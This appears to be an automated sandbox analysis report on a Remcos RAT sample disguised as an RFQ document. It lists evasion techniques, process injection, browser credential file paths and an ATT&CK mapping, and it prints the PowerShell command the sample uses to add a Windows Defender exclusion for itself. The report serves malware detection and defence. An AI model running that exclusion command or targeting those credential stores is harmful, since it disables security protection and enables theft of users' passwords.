                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0040E54F Sleep,ExitProcess,5_2_0040E54F
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: 5060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: 9740000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: A740000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: A960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: B960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_004198D2
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5844Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3858Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeWindow / User API: threadDelayed 9817Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeAPI coverage: 9.0 %
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep count: 177 > 30Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep time: -531000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep count: 9817 > 30Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe TID: 7972Thread sleep time: -29451000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B43F
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0044D5F9 FindFirstFileExA,5_2_0044D5F9
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C79
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00406F06
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: RFQ-20241230.pif.exe, 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeAPI call chain: ExitProcess graph end nodegraph_5-47953
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043A66D
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00442564 mov eax, dword ptr fs:[00000030h]5_2_00442564
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0044E93E GetProcessHeap,5_2_0044E93E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00434178
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043A66D
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00433B54
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00433CE7 SetUnhandledExceptionFilter,5_2_00433CE7
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMemory written: C:\Users\user\Desktop\RFQ-20241230.pif.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_00410F36
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00418764 mouse_event,5_2_00418764
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess created: C:\Users\user\Desktop\RFQ-20241230.pif.exe "C:\Users\user\Desktop\RFQ-20241230.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00433E1A cpuid 5_2_00433E1A
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetLocaleInfoW,5_2_004510CA
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: EnumSystemLocalesW,5_2_004470BE
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004511F3
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetLocaleInfoW,5_2_004512FA
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_004513C7
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetLocaleInfoW,5_2_004475A7
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetLocaleInfoA,5_2_0040E679
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00450A8F
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: EnumSystemLocalesW,5_2_00450D52
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: EnumSystemLocalesW,5_2_00450D07
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: EnumSystemLocalesW,5_2_00450DED
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00450E7A
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeQueries volume information: C:\Users\user\Desktop\RFQ-20241230.pif.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00404915 GetLocalTime,CreateEventA,CreateThread,5_2_00404915
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041A7B2 GetComputerNameExW,GetUserNameW,5_2_0041A7B2
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_0044801F
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040B335
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: \key3.db5_2_0040B335

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-4WOIVVJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: cmd.exe5_2_00405042

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		11
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Bypass User Account Control                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol111
                Input Capture                		2
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		Logon Script (Windows)1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Windows Service                		2
                Software Packing                		NTDS3
                File and Directory Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script121
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets33
                System Information Discovery                		SSHKeylogging1
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Bypass User Account Control                		Cached Domain Credentials21
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync31
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
                Process Injection                		Network Sniffing1
